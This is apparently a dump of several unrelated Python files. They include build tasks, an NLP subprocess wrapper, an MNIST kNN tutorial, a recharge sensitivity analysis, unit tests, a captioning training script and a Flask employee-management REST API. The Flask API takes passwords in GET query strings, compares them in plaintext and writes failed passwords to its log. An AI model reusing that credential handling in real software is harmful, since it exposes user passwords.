@nox.session(reuse_venv=True, python=['3.6', '3.7'])
def test(session):
"""Runs pytest"""
with open('requirements_dev.txt', 'r') as reqs_file:
reqs = reqs_file.readlines()
session.install(*reqs)
session.run('pip', 'list')
session.run('pytest')
@nox.session(reuse_venv=True)
def check_coverage(session):
"""Checks tests for total coverage. Outputs to stdout and htmlcov/"""
with open('requirements_dev.txt', 'r') as reqs_file:
reqs = reqs_file.readlines()
session.install(*reqs)
for cmd in [
['coverage', 'run', '--source', 'fr2ics', '-m', 'pytest'],
['coverage', 'report', '-m'],
['coverage', 'html']
]:
session.run(*cmd)
_browser('htmlcov/index.html')
@nox.session(reuse_venv=True)
def lint(session):
"""Checks the project with pylint"""
session.install('pylint')
    session.run('pylint', 'fr2ics')
@nox.session(reuse_venv=True)
def build_docs(session):
"""Builds documentation using Sphinx. Outputs to docs/, will open browser."""
session.install('Sphinx')
# clean up a bit first
for del_file in ['docs/fr2ics.rst',
'docs/modules.rst']:
try:
os.remove(del_file)
except FileNotFoundError as fnfe:
pass
# build docs
session.run('sphinx-apidoc', '-o', 'docs/', 'fr2ics')
# TODO: upload to S3? readthedocs? github pages?
_browser('docs/')
@nox.session(reuse_venv=True)
def build_sdist(session):
"""Builds Source Distribution package. Outputs to dist/"""
session.run('python3', 'setup.py', 'sdist')
assert os.path.exists('dist/')
|
StarcoderdataPython
|
11359575
|
<filename>text_extraction/lingpipe.py<gh_stars>1-10
import subprocess
#import xml.dom.minidom
import time
class LingPipe:
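    '''Thin wrapper around a LingPipe command-line executable: the program at the given path is started as a subprocess and text is exchanged with it line by line over stdin/stdout.'''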
path = ''
def __init__(self, pathToLingPipe):
self.path = pathToLingPipe
self.process = subprocess.Popen([self.path],stdout=subprocess.PIPE,stdin=subprocess.PIPE)
def parse(self, text):
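        '''Writes each line of the text to the LingPipe subprocess and collects its output lines until a blank line is read back; returns the list of result lines (an empty list for empty input).'''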
results = list()
text = text.strip()
if len(text) == 0:
return results
#print text
#print str(self.process)
for oneline in text.split('\n'):
self.process.stdin.write(oneline+'\n')
#print oneline
while True:
#print "HERE"
r = self.process.stdout.readline()[:-1]
#print r
if not r:
# Waiting for a blank line
break
results.append(r)
return results
def __del__(self):
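        '''Closes the subprocess's stdin and drains any remaining output, raising an exception if LingPipe produced unexpected extra data.'''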
self.process.stdin.close()
slippage = False
for line in self.process.stdout:
print "UNEXPECTED DATA:", line.strip()
slippage = True
if slippage:
raise Exception('Lingpipe slippage occurred. Receiving additional Lingpipe data when none expected')
|
StarcoderdataPython
|
3384442
|
<reponame>OsbornHu/tensorflow-ml
#!/usr/bin/python2.7
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2018/12/8 1:52 PM
# 5.6 Image recognition with TensorFlow
# 1. Import the necessary libraries
import random
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
from tensorflow.examples.tutorials.mnist import input_data
# 2. Create a graph session, load the MNIST handwritten digit dataset, and request one-hot encoded labels
sess = tf.Session()
mnist = input_data.read_data_sets('MNIST_data/', one_hot=True)
"""
One-hot encoding converts the class labels into numeric vectors, which makes the subsequent numerical computations easier. This example has 10 classes (digits 0 to 9), each represented by a 0-1 vector of length 10. For example, class "0" is represented by the vector 1,0,0,0,0,0,0,0,0,0 and class "1" by 0,1,0,0,0,0,0,0,0,0, and so on.
"""
# 3. The MNIST dataset is large, and computing distances over the 784 features of tens of thousands of inputs is expensive, so this example samples a smaller subset for training
train_size = 1000
test_size = 102
rand_train_indices = np.random.choice(len(mnist.train.images), train_size, replace=False)
rand_test_indices = np.random.choice(len(mnist.test.images), test_size, replace=False)
x_vals_train = mnist.train.images[rand_train_indices]
x_vals_test = mnist.test.images[rand_test_indices]
y_vals_train = mnist.train.labels[rand_train_indices]
y_vals_test = mnist.test.labels[rand_test_indices]
# 4. Declare the k value and the batch size
k = 4
batch_size = 6
# 5. Initialize the placeholders in the computational graph
x_data_train = tf.placeholder(shape=[None, 784], dtype=tf.float32)
x_data_test = tf.placeholder(shape=[None, 784], dtype=tf.float32)
y_target_train = tf.placeholder(shape=[None, 10], dtype=tf.float32)
y_target_test = tf.placeholder(shape=[None, 10], dtype=tf.float32)
# 6. Declare the distance metric. This example uses the L1 norm (absolute value) as the distance function
distance = tf.reduce_sum(tf.abs(tf.subtract(x_data_train, tf.expand_dims(x_data_test, 1))), reduction_indices=2)
"""
Note that the distance function could instead be defined as the L2 norm. The corresponding code would be:
distance = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(x_data_train, tf.expand_dims(x_data_test, 1))), reduction_indices=1))
"""
# 7. Find the top-k closest training images and build the prediction: gather the one-hot labels of the neighbours, sum the counts per class, and take the argmax
top_k_xvals, top_k_indices = tf.nn.top_k(tf.negative(distance), k=k)
prediction_indices = tf.gather(y_target_train, top_k_indices)
count_of_predictions = tf.reduce_sum(prediction_indices, dimension=1)
prediction = tf.argmax(count_of_predictions, dimension=1)
# 8. Iterate over the test set in batches, compute the predictions, and store the results
num_loops = int(np.ceil(len(x_vals_test)/batch_size))
test_output = []
actual_vals = []
for i in range(num_loops):
min_index = i*batch_size
max_index = min((i+1)*batch_size, len(x_vals_train))
x_batch = x_vals_test[min_index:max_index]
y_batch = y_vals_test[min_index:max_index]
    predictions = sess.run(prediction, feed_dict={x_data_train: x_vals_train, x_data_test: x_batch, y_target_train: y_vals_train, y_target_test: y_batch})
    test_output.extend(predictions)
    actual_vals.extend(np.argmax(y_batch, axis=1))
# 9. With the actual and predicted values saved, compute the model accuracy. The result varies with the random sampling of the test and training sets, but is roughly 80%~90%
accuracy = sum([1./test_size for i in range(test_size) if test_output[i] == actual_vals[i]])
print('Accuracy on test set:' + str(accuracy))
# Accuracy on test set: 0.8333333333333325
# 10. Plot the results of the last batch
actuals = np.argmax(y_batch, axis=1)
Nrows = 2
Ncols = 3
for i in range(len(actuals)):
plt.subplot(Nrows, Ncols, i+1)
plt.imshow(np.reshape(x_batch[i], [28,28]), cmap='Greys_r')
plt.title('Actual: ' + str(actuals[i]) + ' Pred: ' + str(predictions[i]), fontsize=10)
frame = plt.gca()
frame.axes.get_xaxis().set_visible(False)
frame.axes.get_yaxis().set_visible(False)
|
StarcoderdataPython
|
6564934
|
<filename>zobs/orecharge/Point_Analysis/ETRM_Point_SAUA_spider_only.py<gh_stars>1-10
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
from datetime import datetime
import matplotlib.pyplot as plt
from matplotlib import rc
from osgeo import ogr
import etrm_daily_SA_2MAY16
import extract_readIn
import numpy as np
import pandas
rc('mathtext', default='regular')
save_path = 'C:\\Users\\David\\Documents\\ArcGIS\\results\\Sensitivity_analysis\\data'
pandas.set_option('display.max_rows', 3000)
pandas.set_option('display.max_columns', 3000)
pandas.set_option('display.width', 10000)
pandas.set_option('display.precision', 3)
pandas.options.display.float_format = '${:,.2f}'.format
np.set_printoptions(threshold=3000, edgeitems=5000, precision=3)
pandas.set_option('display.height', 5000)
pandas.set_option('display.max_rows', 5000)
startTime = datetime.now()
print(startTime)
def print_full(x):
pandas.set_option('display.max_rows', len(x))
print(x)
pandas.reset_option('display.max_rows')
def round_to_value(number, roundto):
return round(number / roundto) * roundto
def dfv(begin_ind, end_ind):
return df.iloc[begin_ind, end_ind]
def save_df(df, save_path):
df.to_csv('{}\\data1.csv'.format(save_path), sep=',')
np.set_printoptions(linewidth=700, precision=2, threshold=2500)
# Set start datetime object
start, end = datetime(2000, 1, 1), datetime(2013, 12, 31)
# Define winter and summer for SNOW algorithm
sWin, eWin = datetime(start.year, 11, 1), datetime(end.year, 3, 30)
# Define monsoon for Ksat, presumed storm intensity
sMon, eMon = datetime(start.year, 6, 1), datetime(start.year, 10, 1)
temps = range(-5, 6)
all_pct = [x * 0.1 for x in range(5, 16)]
ndvi_range = np.linspace(0.9, 1.7, 11)
ndvi_range = np.array([round_to_value(x, 0.05) for x in ndvi_range])
var_arrs = []
y = 0
for x in range(0, 6):
ones = np.ones((5, 11), dtype=float)
zeros = [x * 0.0 for x in range(5, 16)]
norm_ndvi = np.array([1.25 for x in zeros])
if y == 0:
arr = np.insert(ones, y, temps, axis=0)
arr = np.insert(arr, 4, norm_ndvi, axis=0)
arr = arr[0:6]
var_arrs.append(arr)
arr = []
elif y == 4:
arr = np.insert(ones, 0, zeros, axis=0)
arr = np.insert(arr, y, ndvi_range, axis=0)
arr = arr[0:6]
var_arrs.append(arr)
arr = []
elif y == 5:
arr = np.insert(ones, 0, zeros, axis=0)
arr = np.insert(arr, 4, norm_ndvi, axis=0)
arr = arr[0:5]
arr = np.insert(arr, y, all_pct, axis=0)
var_arrs.append(arr)
arr = []
else:
arr = np.insert(ones, 0, zeros, axis=0)
arr = np.insert(arr, y, all_pct, axis=0)
arr = np.insert(arr, 4, norm_ndvi, axis=0)
arr = arr[0:6]
var_arrs.append(arr)
arr = []
y += 1
factors = ['Temperature', 'Precipitation', 'Reference ET', 'Total Water Storage (TAW)',
'Vegetation Density (NDVI)', 'Soil Evaporation Depth']
normalize_list = [2, 0.20, 0.20, 2, 0.20, 0.50]
normalize_list = [1 for x in range(0, len(normalize_list) + 1)]
site_list = ['Bateman', 'Navajo_Whiskey_Ck', 'Quemazon', 'Sierra_Blanca', 'SB_1', 'SB_2', 'SB_4', 'SB_5', 'VC_1',
'VC_2', 'VC_3', 'CH_1', 'CH_3', 'MG_1', 'MG_2', 'WHLR_PK', 'LP', 'South_Baldy',
'Water_Canyon', 'La_Jencia', 'Socorro']
df = pandas.DataFrame(columns=factors, index=site_list)
df_norm = pandas.DataFrame(columns=factors, index=site_list)
yy = 0
for var_arr in var_arrs:
factor = factors[yy]
print(factor)
print('')
shp_filename = 'C:\\Recharge_GIS\\qgis_layers\\sensitivity_points\\SA_pnts29APR16_UTM.shp'
ds = ogr.Open(shp_filename)
lyr = ds.GetLayer()
defs = lyr.GetLayerDefn()
for feat in lyr:
name = feat.GetField("Name")
name = name.replace(' ', '_')
geom = feat.GetGeometryRef()
mx, my = geom.GetX(), geom.GetY()
path = 'C:\Users\David\Documents\Recharge\Sensitivity_analysis\SA_extracts'
file_name = '{}\\{}_extract.csv'.format(path, name)
print(file_name)
extract_data = extract_readIn.read_std_extract_csv(file_name)
rslts = []
for col in var_arr.T:
pt_data, tot_data, mass_data = etrm_daily_SA_2MAY16.run_daily_etrm(start, end, extract_data,
sMon, eMon, col)
rech = np.sum(pt_data[:, 9])
rslts.append(rech)
df.iloc[site_list.index(name), factors.index(factor)] = np.divide(np.array(rslts), 14.0)
# tot_data : precip, et, tot_transp, tot_evap, infil, runoff, snow_fall, cum_mass, end_mass
yy += 1
# "SI = [Q(Po + delP] -Q(Po - delP] / (2 * delP)"
# where SI = Sensitivity Index, Q = etrm, Po = base value of input parameter, delP = change in value of input var
# find sensitivity index
xx = 0
for param in df.iteritems():
data_cube = param[1]
var_arr = var_arrs[xx]
yy = 0
for site in data_cube:
print(site)
site_name = site_list[yy]
normal = normalize_list[xx]
site_obj = [x for x in site]
sens_list = []
zz = 0
for var in var_arr[xx]:
if var != var_arr[xx][5]:
base = var_arr[xx][5]
deltaP = var - base
obj = site_obj[zz]
sen = ((obj * (base + deltaP) - obj * (base - deltaP)) / (2 * deltaP)) * normal
sens_list.append(sen)
zz += 1
else:
sens_list.append(site_obj[zz])
zz += 1
sens_list = np.array(sens_list)
df_norm.iloc[site_list.index(site_name), factors.index(param[0])] = sens_list
if yy == 20:
print('done')
break
yy += 1
xx += 1
fig_path = 'C:\\Users\\David\\Documents\\ArcGIS\\results\\Sensitivity_analysis\\normalized'
disp_pct = [(int(x)) for x in np.add(np.multiply(all_pct, 100.0), -100)]
# disp_pct.remove(0)
temps = range(-5, 6)
# temps.remove(0)
all_pct = [x * 0.1 for x in range(5, 16)]
# all_pct.remove(1.0)
ndvi_range = np.linspace(0.9, 1.7, 11)
ndvi_range = [round_to_value(x, 0.05) for x in ndvi_range]
# ndvi_range.remove(1.3)
ndvi_range = np.array(ndvi_range)
for index, row in df_norm.iterrows():
if row.name == 'La_Jencia': # ['South_Baldy', 'Water_Canyon', 'La_Jencia', 'Socorro']:
print(index, row)
fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
ax2.plot(temps, row[0], 'k', marker='x', label='Temperature (+/- 5 deg C)')
ax1.plot(disp_pct, row[1], 'blue', marker='o', label='Precipitation (+/- 50%)')
ax1.plot(disp_pct, row[2], 'purple', marker='^', label='Reference Evapotranspiration (+/- 50%)')
ax1.plot(disp_pct, row[3], 'brown', marker='h', label='Total Available Water (+/- 50%)')
ax3.plot(ndvi_range, row[4], 'green', marker='s', linestyle='-.', label='Normalized Density Vegetation\n'
' Index Conversion Factor (0.9 - 1.8)')
ax1.plot(disp_pct, row[5], 'red', marker='*', label='Soil Evaporation Layer Thickness (+/- 50%)')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge per Year (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("bottom")
ax3.xaxis.set_label_position("bottom")
ax3.spines["bottom"].set_position(("axes", -0.3))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['bottom'].set_visible(True)
plt.title('Variation of ETRM Physical Parameters at {}'.format(index.replace('_', ' ')), y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
plt.show()
plt.savefig('{}\\{}_spider_10JUL16_2'.format(fig_path, index), ext='png', figsize=(20, 10))
plt.close(fig)
|
StarcoderdataPython
|
1796065
|
# File name: test_libraries.py
# Author: <NAME>
# Date created: 23-08-2018
"""Tests buf.libraries."""
from unittest import TestCase, mock
import unittest
from buf import libraries
import os
import sys
import tempfile
class TestMakeDir(TestCase):
"""Tests buf.libraries.make_library."""
def test_already_exists(self):
"""Tests that the function raises an error if the directory it is trying to create already exists."""
with mock.patch("buf.libraries.os.path.exists", return_value = True):
with self.assertRaises(IsADirectoryError):
libraries.make_library_dir()
def test_proper_directory_creation(self):
"""Tests that the function properly creates a directory if none exists."""
with mock.patch("buf.libraries.os.path.exists", return_value = False):
with mock.patch("buf.libraries.os.mkdir") as mock_make_dir:
libraries.make_library_dir()
mock_make_dir.assert_called_with(libraries.library_dir)
class TestEnsureLibraryDirExists(TestCase):
"""Tests buf.libraries.ensure_library_dir_exists."""
def test_existence_check(self):
"""Tests that the function checks whether library_dir exists."""
with mock.patch("buf.libraries.os.path.exists", side_effect = SystemExit) as mock_check:
with self.assertRaises(SystemExit):
libraries.ensure_library_dir_exists()
mock_check.assert_called_with(libraries.library_dir)
def test_directory_creation(self):
"""Tests that the function actually makes library_dir if it doesn't exist."""
with mock.patch("buf.libraries.os.path.exists", return_value = False):
with mock.patch("buf.libraries.os.mkdir") as mock_make_dir:
libraries.ensure_library_dir_exists()
mock_make_dir.assert_called_with(libraries.library_dir)
class TestAddLibraryFile(TestCase):
"""Tests buf.libraries.add_library_file."""
def test_library_dir_existence_check(self):
"""Tests that the function ensures that library_dir has already been created."""
with mock.patch("buf.libraries.ensure_library_dir_exists", side_effect = SystemExit) as mock_check:
with self.assertRaises(SystemExit):
libraries.add_library_file("file.txt")
mock_check.assert_called()
def test_file_already_exists_check(self):
"""Tests that the function raises an error if the file it is trying to create already exists."""
with mock.patch("buf.libraries.os.path.exists", return_value = True):
with self.assertRaises(FileExistsError):
libraries.add_library_file("file.txt")
def test_proper_file_creation(self):
"""Tests that the function properly creates a directory if none exists."""
test_file_name = "file.txt"
test_file_path = os.path.join(sys.prefix, libraries.library_dir, test_file_name)
with mock.patch("buf.libraries.os.path.exists", return_value = False):
with mock.patch("buf.libraries.ensure_library_dir_exists"):
with mock.patch("buf.libraries.open") as mock_open:
libraries.add_library_file(test_file_name)
mock_open.assert_called_with(test_file_path, "w")
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9733997
|
<reponame>SideShowBoBGOT/EPAM-project
"""
Module contains classes to work with REST API for Employees.
Classes:
EmployeesAPIget(Resource)
EmployeesAPIadd(Resource)
EmployeesAPIedit(Resource)
EmployeesAPIdel(Resource)
"""
from flask_restful import Resource, abort, reqparse
from flask import redirect
import os
import sys
import datetime
sys.path.append(os.path.abspath(os.path.join('..')))
from .common_funcs import check_empty_strings
from models.users import User
from models.departments import Departments
from models.employees import Employees
from f_logger import logger
from migrations.migrations_funcs import find_emp
from service import add_emp, change_emp, del_emp
get_args = reqparse.RequestParser()
get_args.add_argument("login", type=str, help="User`s login", required=True)
get_args.add_argument("password", type=str, help="<PASSWORD>`s password", required=True)
add_args = reqparse.RequestParser()
add_args.add_argument("login", type=str, help="User`s login", required=True)
add_args.add_argument("password", type=str, help="<PASSWORD>`<PASSWORD>", required=True)
add_args.add_argument("name", type=str, help="Name of new employee", required=True)
add_args.add_argument("department", type=str, help="Department of new employee", required=True)
add_args.add_argument("salary", type=str, help="Salary of new employee", required=True)
add_args.add_argument("birth_date", type=str, help="Birthdate of new employee", required=True)
add_args.add_argument("page", type=str, help="Redirects to prev page")
find_args = reqparse.RequestParser()
find_args.add_argument("login", type=str, help="User`s login", required=True)
find_args.add_argument("password", type=str, help="User`s password", required=True)
find_args.add_argument("from_date", type=str, help="Format: YYYY-mm-dd. Date from which employee is sought",
required=True)
find_args.add_argument("to_date", type=str, help="Format: YYYY-mm-dd. Date till which employee is sought",
required=True)
find_args.add_argument("page", type=str, help="Redirects to prev page")
edit_args = reqparse.RequestParser()
edit_args.add_argument("login", type=str, help="User`s login", required=True)
edit_args.add_argument("password", type=str, help="User`s password", required=True)
edit_args.add_argument("name", type=str, help="New name of the employee", required=True)
edit_args.add_argument("department", type=str, help="New department of the employee", required=True)
edit_args.add_argument("salary", type=str, help="New salary of the employee", required=True)
edit_args.add_argument("birth_date", type=str, help="New birthdate of the employee", required=True)
edit_args.add_argument("id", type=int, help="Id of the employee to edit", required=True)
edit_args.add_argument("page", type=str, help="Redirects to prev page")
del_args = reqparse.RequestParser()
del_args.add_argument("login", type=str, help="User`s login", required=True)
del_args.add_argument("password", type=str, help="<PASSWORD>`s password", required=True)
del_args.add_argument("id", type=int, help="Id of the employee to delete", required=True)
del_args.add_argument("page", type=str, help="Redirects to prev page")
class EmployeesAPIget(Resource):
"""
    Class, which is a descendant of Resource, is responsible
    for returning info about the employees in the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, giving info about employees,
only if credentials are correct.
:return: dict of user information
"""
args = get_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
if user and user.password == password:
employees_dict = dict()
employees = Employees.query.all()
for index, emp in enumerate(employees):
employees_dict[f'{index}'] = {'id': emp.id, 'name': emp.name,
'department': emp.department,
'salary': emp.salary,
'birth_date': str(emp.birth_date)}
return employees_dict
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIadd(Resource):
"""
    Class, which is a descendant of Resource, is responsible
for adding employees to the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, adding employees,
only if arguments and credentials are correct.
:return: dict of messages or errors
"""
args = add_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
name = args['name']
department = args['department']
salary = args['salary']
birth_date = args['birth_date']
page = args.get('page')
if user and user.password == password and user.id == 1:
try:
birth_date = datetime.datetime.strptime(birth_date, '%Y-%m-%d').date()
salary = float(salary)
if Departments.query.filter_by(department=department).first() \
and check_empty_strings(name) and salary > 0:
add_emp(name, department, salary, birth_date)
logger.info(f'Added employee: name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
return {'message': 'ADD_SUCCESS'}
raise ValueError
except:
logger.info(f'Failed adding employee: name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
logger.info(f'Failed adding employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIfind(Resource):
"""
    Class, which is a descendant of Resource, is responsible
for finding employees by date of birth.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, finding employees by
date of birth, only if arguments and
credentials are correct.
:return: dict of messages or errors
"""
args = find_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
from_date = args['from_date']
to_date = args['to_date']
page = args.get('page')
if user and user.password == password:
try:
from_date = datetime.datetime.strptime(from_date, '%Y-%m-%d').date()
to_date = datetime.datetime.strptime(to_date, '%Y-%m-%d').date()
if to_date < from_date:
raise ValueError
employees = find_emp(from_date, to_date)
employees_dict = dict()
ids = ''
for index, emp in enumerate(employees):
employees_dict[f'{index}'] = {'id': emp.id, 'name': emp.name,
'department': emp.department,
'salary': emp.salary,
'birth_date': str(emp.birth_date)}
ids += str(emp.id) + '.'
logger.info(f'Found employees: from_date: "{from_date}"\tto_date: "{to_date}"')
if page and page == 'True':
if ''.join(ids.split('.')):
return redirect('/employees/' + ids[:-1])
return redirect('/employees')
return employees_dict
except:
logger.info(f'Failed finding employees: from_date: "{from_date}"\tto_date: "{to_date}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
else:
logger.info(f'Failed adding employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIedit(Resource):
"""
    Class, which is a descendant of Resource, is responsible
    for editing employees in the table.
Methods:
get(self)
"""
def get(self):
"""
Method overrides get method of Resource and
works on get method, editing employees,
only if arguments and credentials are correct.
:return: dict of messages or errors
"""
args = edit_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
name = args['name']
department = args['department']
salary = args['salary']
birth_date = args['birth_date']
id = args['id']
page = args.get('page')
if user and user.password == password and user.id == 1:
try:
birth_date = datetime.datetime.strptime(birth_date, '%Y-%m-%d').date()
salary = float(salary)
if Employees.query.get(id) and Departments.query.filter_by(department=department).first() \
and check_empty_strings(name) and salary > 0:
change_emp(id, name, department, salary, birth_date)
logger.info(f'Edited employee: id: "{id}"\t name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
return {'message': 'EDIT_SUCCESS'}
raise ValueError
            except Exception:
logger.info(f'Failed editing employee: id: "{id}"\t name: "{name}"\tdepartment: "{department}"'
f'\tsalary: "{salary}"\tbirthdate: "{birth_date}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
        logger.info(f'Failed editing employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
class EmployeesAPIdel(Resource):
"""
    Class, a descendant of Resource, responsible
    for deleting employees from the table.
Methods:
get(self)
"""
def get(self):
"""
        Overrides the Resource.get handler and processes GET requests,
        deleting an employee only if the arguments and credentials
        are correct.
:return: dict of messages or errors
"""
args = del_args.parse_args()
login = args['login']
password = args['password']
user = User.query.filter_by(login=login).first()
id = args['id']
page = args.get('page')
if user and user.password == password and user.id == 1:
if Employees.query.get(id):
del_emp(id)
logger.info(f'Deleted employee: id: "{id}"')
if page and page == 'True':
return redirect('/employees')
return {'message': 'DEL_SUCCESS'}
logger.info(f'Failed deleting employee: id: "{id}"')
if page and page == 'True':
return redirect('/employees')
abort(406, error='ARGUMENTS_INCORRECT')
        logger.info(f'Failed deleting employee: incorrect login: "{login}" or password: "{password}"')
abort(401, error='CREDENTIALS_INCORRECT')
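# A minimal client-side sketch (not part of the API itself). The endpoint URL and port
# below are assumptions, since the Api.add_resource() routing is not shown in this module.
#
#   import requests
#   resp = requests.get('http://localhost:5000/api/employees/add', params={
#       'login': 'admin', 'password': 'secret', 'name': 'John Doe',
#       'department': 'Sales', 'salary': 1000, 'birth_date': '1990-01-01'})
#   print(resp.json())  # {'message': 'ADD_SUCCESS'} on success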
#import sys
# sys.path.insert(0, '/content/gdrive/MyDrive/Tese/code') # for colab
from src.classification_scripts.SupConLoss.train_supcon import FineTuneSupCon
from src.classification_scripts.ALS.train_ALSingle import FineTuneALS
from src.classification_scripts.cross_entropy.train_ce import FineTuneCE
from src.configs.setters.set_initializers import *
from src.captioning_scripts.baseline.train_baseline import TrainBaseline
from src.captioning_scripts.fusion.gpt2.train_gpt2 import TrainGPT2
from src.captioning_scripts.fusion.pegasus.train_pegasus import TrainPegasus
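# The constants used below (TASK, ARCHITECTURE, AUX_LM, LOSS, ENCODER_MODEL, DEVICE,
# EXTRA_EPOCHS, SELF_CRITICAL) come from the wildcard import of set_initializers above.
# The values shown here are only an illustrative assumption of how the dispatch is driven:
#
#   TASK = 'Captioning'                          # or 'Classification'
#   ARCHITECTURE = ARCHITECTURES.FUSION.value    # or ARCHITECTURES.BASELINE.value
#   AUX_LM = AUX_LMs.PEGASUS.value               # or AUX_LMs.GPT2.value
#   LOSS = LOSSES.SupConLoss.value               # or LOSSES.Cross_Entropy.value / LOSSES.ALS.value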
if TASK == 'Captioning':
if ARCHITECTURE == ARCHITECTURES.BASELINE.value:
        # initialize the class
        _train = TrainBaseline(language_aux=None, pretrain=False, fine_tune_encoder=False, model_version='v2')
    elif ARCHITECTURE == ARCHITECTURES.FUSION.value:
        if AUX_LM == AUX_LMs.GPT2.value:
            _train = TrainGPT2(language_aux=AUX_LM, fine_tune_encoder=False, model_version='v2')
        elif AUX_LM == AUX_LMs.PEGASUS.value:
            _train = TrainPegasus(language_aux=AUX_LM, pretrain=False, fine_tune_encoder=False, nr_inputs=1, model_version='v2')
# setup the vocab (size and word map)
_train._setup_vocab()
# init model
_train._init_model()
    # load the checkpoint if it exists; Pegasus (multi-input) needs the real nr_inputs value
    _train._load_weights_from_checkpoint(_train.decoder, _train.decoder_optimizer, _train.encoder, _train.encoder_optimizer, is_current_best=True,
                                         nr_inputs=_train.nr_inputs if ARCHITECTURE == ARCHITECTURES.FUSION.value
                                         and AUX_LM == AUX_LMs.PEGASUS.value else 1)
# load dataloaders (train and val)
_train._setup_dataloaders()
# setup parameters for training
_train._setup_train(_train._train_critical if SELF_CRITICAL else _train._train, _train._validate)
elif TASK == 'Classification':
# to run extra epochs with a different loss
if EXTRA_EPOCHS:
logging.basicConfig(
format='%(levelname)s: %(message)s', level=logging.INFO)
logging.info('PRETRAINING ENCODER WITH EXTRA EPOCHS ON {}...'.format(LOSS))
        if LOSS == LOSSES.SupConLoss.value:
            model = FineTuneSupCon(model_type=ENCODER_MODEL, device=DEVICE, file='classification_scripts/encoder_training_details.txt', eff_net_version='v2')
        elif LOSS == LOSSES.Cross_Entropy.value:
            model = FineTuneCE(model_type=ENCODER_MODEL, device=DEVICE, file='classification_scripts/encoder_training_details.txt', eff_net_version='v2')
        elif LOSS == LOSSES.ALS.value:
            model = FineTuneALS(model_type=ENCODER_MODEL, device=DEVICE, file='classification_scripts/encoder_training_details.txt', eff_net_version='v2')
model._setup_train()
model._setup_transforms()
model._setup_dataloaders()
model.train(model.train_loader, model.val_loader)
else:
if LOSS == LOSSES.Cross_Entropy.value:
logging.basicConfig(
format='%(levelname)s: %(message)s', level=logging.INFO)
logging.info('PRETRAINING ENCODER WITH CROSS-ENTROPY...')
            model = FineTuneCE(model_type=ENCODER_MODEL, device=DEVICE, file='classification_scripts/encoder_training_details.txt', eff_net_version='v2')
model._setup_train()
model._setup_transforms()
model._setup_dataloaders()
model.train(model.train_loader, model.val_loader)
elif LOSS == LOSSES.SupConLoss.value:
logging.basicConfig(
format='%(levelname)s: %(message)s', level=logging.INFO)
logging.info('PRETRAINING ENCODER WITH SUPERVISED CONTRASTIVE LOSS...')
            model = FineTuneSupCon(model_type=ENCODER_MODEL, device=DEVICE, file='classification_scripts/encoder_training_details.txt', eff_net_version='v2')
model._setup_train()
model._setup_transforms()
model._setup_dataloaders()
model.train(model.train_loader, model.val_loader)
# -*- coding:utf-8 -*-
import pytest
from gitticket import github
from gitticket import ticket
from gitticket import config
from gitticket import util
def mock_git():
return {'ticket.name': 'user',
'ticket.repo': 'testrepo',
'ticket.service': 'github',
'ticket.format.list': 'list_format',
'ticket.format.show': 'show_format',
'ticket.format.comment': 'comment_format',
'ticket.github.token': 'github_token',
'ticket.bitbucket.token': 'bitbucket_token',
'ticket.bitbucket.token-secret': 'bitbucket_token_secret',
'ticket.redmine.url': 'http://example.com/',
'ticket.redmine.token': 'redmine_token',
'http.sslVerify': 'true'}
def mock_request_list(*args, **kwargs):
return [{u'body': u'body',
u'title': u"title",
